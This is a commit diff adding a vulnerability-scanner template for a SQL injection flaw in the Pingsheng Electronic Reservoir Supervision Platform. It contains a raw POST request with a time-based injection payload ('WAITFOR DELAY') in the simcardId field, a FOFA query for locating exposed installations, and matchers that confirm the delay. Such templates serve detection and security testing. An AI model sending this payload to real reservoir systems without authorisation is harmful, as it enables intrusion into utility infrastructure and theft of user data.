add pingsheng sqli

http/vulnerabilities/other/pingsheng-electronic-sqli.yaml

@@ -0,0 +1,33 @@
+id: pingsheng-electronic-sqli
+
+info:
+  name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
+  author: securityforeveryone
+  severity: critical
+  description: |
+    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
+  reference:
+    - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: "js/PSExtend.js"
+  tags: sqli,pingsheng
+
+http:
+  - raw:
+      - |
+        @timeout 20s
+        POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains_all(body,"Result","false","Message","?xml version")'
+          - 'status_code == 200'
+        condition: and